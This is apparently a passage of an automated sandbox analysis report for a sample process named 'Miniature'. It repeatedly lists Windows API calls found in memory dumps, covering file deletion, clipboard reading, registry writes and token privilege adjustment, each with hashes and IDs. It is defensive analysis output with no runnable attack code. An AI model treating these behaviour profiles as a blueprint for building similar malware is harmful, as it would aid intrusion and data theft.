                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 3165410b31fa46077bb985a5696efa3101b0d98857a5293ed0ac99d7833ac51a
                                                  • Instruction ID: 6acc08737a756962760a242505e6517bc31a0a985fc237f8e1b6d94a4b7f07cd
                                                  • Opcode Fuzzy Hash: 3165410b31fa46077bb985a5696efa3101b0d98857a5293ed0ac99d7833ac51a
                                                  • Instruction Fuzzy Hash: 3BD0C77464030CBFE710CB80DC46FA9777CE705710F200194FD0466294D6B27D508795
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,00FF3BFE), ref: 00FF4FED
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 3a7db38067a16e24088e1b43d4613a213c4c9b64bc8be54c62d549f6848ef7c9
                                                  • Instruction ID: 04341dc635eb67b4cbf0e0e6bd811e31a4dbf16466d40b24d71e0ccba6f4ddab
                                                  • Opcode Fuzzy Hash: 3a7db38067a16e24088e1b43d4613a213c4c9b64bc8be54c62d549f6848ef7c9
                                                  • Instruction Fuzzy Hash: 63B09234400705569D381E3C154C0AA33015C423B97F81B81E5BC868F5A23AA84BB620
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __wfsopen
                                                  • String ID:
                                                  • API String ID: 197181222-0
                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction ID: 9708698f8020037b0def542b205f19d2fde21a0cacdb72d14643b01ede2c1018
                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction Fuzzy Hash: 21B09B7544010C77CE011942EC03B553B195740664F404010FB0C1C161A57795605585
                                                  APIs
                                                  • GetLastError.KERNEL32(00000002,00000000), ref: 00FFD842
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID:
                                                  • API String ID: 1452528299-0
                                                  • Opcode ID: d6db694934135f7d3be9c66ae686502ed8985f26facd5409eabbf77fba27269b
                                                  • Instruction ID: 89489c1a94264c29d59dc29bb3860617a1e09b69f25b264b13e7e8b7f1533a61
                                                  • Opcode Fuzzy Hash: d6db694934135f7d3be9c66ae686502ed8985f26facd5409eabbf77fba27269b
                                                  • Instruction Fuzzy Hash: 2971B3716083068FC714EF64C891AAEB7E1BF85354F04462DF5968B3A2DB34ED05EB52
                                                  APIs
                                                    • Part of subcall function 00FF4005: FindFirstFileW.KERNEL32(?,?), ref: 00FF407C
                                                    • Part of subcall function 00FF4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00FF40CC
                                                    • Part of subcall function 00FF4005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00FF40DD
                                                    • Part of subcall function 00FF4005: FindClose.KERNEL32(00000000), ref: 00FF40F4
                                                  • GetLastError.KERNEL32 ref: 00FFC292
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2191629493-0
                                                  • Opcode ID: 7981d7dcaa0e8a464915aeb21a90ef2d6d80eaca33e6619a0dd4f854a397b9d0
                                                  • Instruction ID: f556d3bca8e6e3fc455f86c67d34d910b757629414e382842b1ae28e3022bc8b
                                                  • Opcode Fuzzy Hash: 7981d7dcaa0e8a464915aeb21a90ef2d6d80eaca33e6619a0dd4f854a397b9d0
                                                  • Instruction Fuzzy Hash: 39F082352102144FDB10EF59D840F6AB7E5AF54320F058059F9458B351CB78BC02DB94
                                                  APIs
                                                  • CloseHandle.KERNEL32(?,?,00000000,00FD2F8B), ref: 00FA42EF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: 5f766b1a904135e3affefdf273255a7d0f74608e982558a1a3801e6807a0a771
                                                  • Instruction ID: 14969572d1261b28b7d66bd2a8b986286638ae43aec2e48a898c4e5962a41b2e
                                                  • Opcode Fuzzy Hash: 5f766b1a904135e3affefdf273255a7d0f74608e982558a1a3801e6807a0a771
                                                  • Instruction Fuzzy Hash: 4AE0BFB5440701CFC3314F1AD404512FBF4FFD53713214A2EE0E692564D3B06495DB50
                                                  APIs
                                                    • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0101D208
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0101D249
                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0101D28E
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0101D2B8
                                                  • SendMessageW.USER32 ref: 0101D2E1
                                                  • _wcsncpy.LIBCMT ref: 0101D359
                                                  • GetKeyState.USER32(00000011), ref: 0101D37A
                                                  • GetKeyState.USER32(00000009), ref: 0101D387
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0101D39D
                                                  • GetKeyState.USER32(00000010), ref: 0101D3A7
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0101D3D0
                                                  • SendMessageW.USER32 ref: 0101D3F7
                                                  • SendMessageW.USER32(?,00001030,?,0101B9BA), ref: 0101D4FD
                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0101D513
                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0101D526
                                                  • SetCapture.USER32(?), ref: 0101D52F
                                                  • ClientToScreen.USER32(?,?), ref: 0101D594
                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0101D5A1
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0101D5BB
                                                  • ReleaseCapture.USER32 ref: 0101D5C6
                                                  • GetCursorPos.USER32(?), ref: 0101D600
                                                  • ScreenToClient.USER32(?,?), ref: 0101D60D
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0101D669
                                                  • SendMessageW.USER32 ref: 0101D697
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0101D6D4
                                                  • SendMessageW.USER32 ref: 0101D703
                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0101D724
                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0101D733
                                                  • GetCursorPos.USER32(?), ref: 0101D753
                                                  • ScreenToClient.USER32(?,?), ref: 0101D760
                                                  • GetParent.USER32(?), ref: 0101D780
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0101D7E9
                                                  • SendMessageW.USER32 ref: 0101D81A
                                                  • ClientToScreen.USER32(?,?), ref: 0101D878
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0101D8A8
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0101D8D2
                                                  • SendMessageW.USER32 ref: 0101D8F5
                                                  • ClientToScreen.USER32(?,?), ref: 0101D947
                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0101D97B
                                                    • Part of subcall function 00F929AB: GetWindowLongW.USER32(?,000000EB), ref: 00F929BC
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0101DA17
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                  • String ID: @GUI_DRAGID$F
                                                  • API String ID: 3977979337-4164748364
                                                  • Opcode ID: 27fccca18d57eca30c53b676bb601078656f408af01836d77c0e114d7b918dab
                                                  • Instruction ID: 84a93a8fd3fe0574d556ffc9b1b719bfc730a2a8d14e59ee3aa011511814195c
                                                  • Opcode Fuzzy Hash: 27fccca18d57eca30c53b676bb601078656f408af01836d77c0e114d7b918dab
                                                  • Instruction Fuzzy Hash: 6642AC35204341AFDB71CFA8C848BAABFE5FF48310F140659F6D5872A9C77A9848DB91
                                                  APIs
                                                    • Part of subcall function 00FE9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FE93E3
                                                    • Part of subcall function 00FE9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FE9410
                                                    • Part of subcall function 00FE9399: GetLastError.KERNEL32 ref: 00FE941D
                                                  • _memset.LIBCMT ref: 00FE8F71
                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FE8FC3
                                                  • CloseHandle.KERNEL32(?), ref: 00FE8FD4
                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FE8FEB
                                                  • GetProcessWindowStation.USER32 ref: 00FE9004
                                                  • SetProcessWindowStation.USER32(00000000), ref: 00FE900E
                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FE9028
                                                    • Part of subcall function 00FE8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FE8F27), ref: 00FE8DFE
                                                    • Part of subcall function 00FE8DE9: CloseHandle.KERNEL32(?,?,00FE8F27), ref: 00FE8E10
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                  • String ID: $default$winsta0
                                                  • API String ID: 2063423040-1027155976
                                                  • Opcode ID: b44e7d356d7acf52d269ef376d516bd976d908343789ebe4cea4eac60f3deb6c
                                                  • Instruction ID: db875990018bdf11279b666b8f763a4575e7bbbf2d86d2d967fe267f79885fb6
                                                  • Opcode Fuzzy Hash: b44e7d356d7acf52d269ef376d516bd976d908343789ebe4cea4eac60f3deb6c
                                                  • Instruction Fuzzy Hash: A181ADB1D04289BFDF219FA1CC49AEE7B79FF08314F144119F954A2264D77A8E05EB60
                                                  APIs
                                                  • OpenClipboard.USER32(01020980), ref: 0100465C
                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0100466A
                                                  • GetClipboardData.USER32(0000000D), ref: 01004672
                                                  • CloseClipboard.USER32 ref: 0100467E
                                                  • GlobalLock.KERNEL32(00000000), ref: 0100469A
                                                  • CloseClipboard.USER32 ref: 010046A4
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 010046B9
                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 010046C6
                                                  • GetClipboardData.USER32(00000001), ref: 010046CE
                                                  • GlobalLock.KERNEL32(00000000), ref: 010046DB
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0100470F
                                                  • CloseClipboard.USER32 ref: 0100481F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                  • String ID:
                                                  • API String ID: 3222323430-0
                                                  • Opcode ID: defc22f8540c97108ded3984bb19e366294e65232f7992a972256ad9f7e4a378
                                                  • Instruction ID: b6986a8c9d4f5d0e119416f757dd40482d88bf6b608100d117d139abc132be59
                                                  • Opcode Fuzzy Hash: defc22f8540c97108ded3984bb19e366294e65232f7992a972256ad9f7e4a378
                                                  • Instruction Fuzzy Hash: F451E171204301ABE321EF64DC89F6E77A8AF88B10F10452AF6C6D21D5EF79D905CB66
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00FFCDD0
                                                  • FindClose.KERNEL32(00000000), ref: 00FFCE24
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FFCE49
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FFCE60
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FFCE87
                                                  • __swprintf.LIBCMT ref: 00FFCED3
                                                  • __swprintf.LIBCMT ref: 00FFCF16
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                  • __swprintf.LIBCMT ref: 00FFCF6A
                                                    • Part of subcall function 00FB38C8: __woutput_l.LIBCMT ref: 00FB3921
                                                  • __swprintf.LIBCMT ref: 00FFCFB8
                                                    • Part of subcall function 00FB38C8: __flsbuf.LIBCMT ref: 00FB3943
                                                    • Part of subcall function 00FB38C8: __flsbuf.LIBCMT ref: 00FB395B
                                                  • __swprintf.LIBCMT ref: 00FFD007
                                                  • __swprintf.LIBCMT ref: 00FFD056
                                                  • __swprintf.LIBCMT ref: 00FFD0A5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                  • API String ID: 3953360268-2428617273
                                                  • Opcode ID: 8da897b1b944882c718c2cd82aa8c712e3ef6151fc5d38ec54053f05afda250a
                                                  • Instruction ID: 2429d408216c3025664b2a17400767bea4d5f7cb1683bf68e9a953e73ad453df
                                                  • Opcode Fuzzy Hash: 8da897b1b944882c718c2cd82aa8c712e3ef6151fc5d38ec54053f05afda250a
                                                  • Instruction Fuzzy Hash: C3A13EB2404305ABD710EFA4DD85DAFB7ECBF95704F400919F585C6191EB38EA09DBA2
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00FFF5F9
                                                  • _wcscmp.LIBCMT ref: 00FFF60E
                                                  • _wcscmp.LIBCMT ref: 00FFF625
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00FFF637
                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00FFF651
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00FFF669
                                                  • FindClose.KERNEL32(00000000), ref: 00FFF674
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00FFF690
                                                  • _wcscmp.LIBCMT ref: 00FFF6B7
                                                  • _wcscmp.LIBCMT ref: 00FFF6CE
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00FFF6E0
                                                  • SetCurrentDirectoryW.KERNEL32(0104B578), ref: 00FFF6FE
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FFF708
                                                  • FindClose.KERNEL32(00000000), ref: 00FFF715
                                                  • FindClose.KERNEL32(00000000), ref: 00FFF727
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                  • String ID: *.*
                                                  • API String ID: 1803514871-438819550
                                                  • Opcode ID: 2b1647604e4c18ac04ab65b09816e13ec24d4c49d9fb14793e7b7578e7e68d6b
                                                  • Instruction ID: ca205609782d4a1d5934bd3c8b75217ade06a149fa95b77cb92cddcbe83cafed
                                                  • Opcode Fuzzy Hash: 2b1647604e4c18ac04ab65b09816e13ec24d4c49d9fb14793e7b7578e7e68d6b
                                                  • Instruction Fuzzy Hash: D831D872A4031DABDB20AEB5DC49AEEB7AC9F09331F200165F944D21A4DF75DA48DF60
                                                  APIs
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01010FB3
                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,01020980,00000000,?,00000000,?,?), ref: 01011021
                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01011069
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 010110F2
                                                  • RegCloseKey.ADVAPI32(?), ref: 01011412
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0101141F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectCreateRegistryValue
                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                  • API String ID: 536824911-966354055
                                                  • Opcode ID: b20272a7089282d403d007371c272b627cdce278224470034a25e2ede0042c24
                                                  • Instruction ID: abd2b269a6b5cdbe90083003e5c8e703b61be6c7c2d0c3acc7b26b99e6a951ee
                                                  • Opcode Fuzzy Hash: b20272a7089282d403d007371c272b627cdce278224470034a25e2ede0042c24
                                                  • Instruction Fuzzy Hash: 10027B752006019FDB15EF29C881E6AB7E5FF89714F04855DF9899B361DB38EC06CB81
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00FFF756
                                                  • _wcscmp.LIBCMT ref: 00FFF76B
                                                  • _wcscmp.LIBCMT ref: 00FFF782
                                                    • Part of subcall function 00FF4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FF4890
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00FFF7B1
                                                  • FindClose.KERNEL32(00000000), ref: 00FFF7BC
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00FFF7D8
                                                  • _wcscmp.LIBCMT ref: 00FFF7FF
                                                  • _wcscmp.LIBCMT ref: 00FFF816
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00FFF828
                                                  • SetCurrentDirectoryW.KERNEL32(0104B578), ref: 00FFF846
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FFF850
                                                  • FindClose.KERNEL32(00000000), ref: 00FFF85D
                                                  • FindClose.KERNEL32(00000000), ref: 00FFF86F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                  • String ID: *.*
                                                  • API String ID: 1824444939-438819550
                                                  • Opcode ID: 894d760f5df9426a035ee0c6b197946ba326b41c85fcb3e710992f24513a6544
                                                  • Instruction ID: 1dffd723fc9887f469ae31fe6a9c7beadbd1dbc362c8d9f7b08e78433d53e56f
                                                  • Opcode Fuzzy Hash: 894d760f5df9426a035ee0c6b197946ba326b41c85fcb3e710992f24513a6544
                                                  • Instruction Fuzzy Hash: 3531DA7294031DABDB20AE75DC88AEEB76C9F05370F240175F944A21B0DB35DE49EB50
                                                  APIs
                                                    • Part of subcall function 00FE8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FE8E3C
                                                    • Part of subcall function 00FE8E20: GetLastError.KERNEL32(?,00FE8900,?,?,?), ref: 00FE8E46
                                                    • Part of subcall function 00FE8E20: GetProcessHeap.KERNEL32(00000008,?,?,00FE8900,?,?,?), ref: 00FE8E55
                                                    • Part of subcall function 00FE8E20: HeapAlloc.KERNEL32(00000000,?,00FE8900,?,?,?), ref: 00FE8E5C
                                                    • Part of subcall function 00FE8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FE8E73
                                                    • Part of subcall function 00FE8EBD: GetProcessHeap.KERNEL32(00000008,00FE8916,00000000,00000000,?,00FE8916,?), ref: 00FE8EC9
                                                    • Part of subcall function 00FE8EBD: HeapAlloc.KERNEL32(00000000,?,00FE8916,?), ref: 00FE8ED0
                                                    • Part of subcall function 00FE8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FE8916,?), ref: 00FE8EE1
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FE8931
                                                  • _memset.LIBCMT ref: 00FE8946
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FE8965
                                                  • GetLengthSid.ADVAPI32(?), ref: 00FE8976
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00FE89B3
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FE89CF
                                                  • GetLengthSid.ADVAPI32(?), ref: 00FE89EC
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FE89FB
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00FE8A02
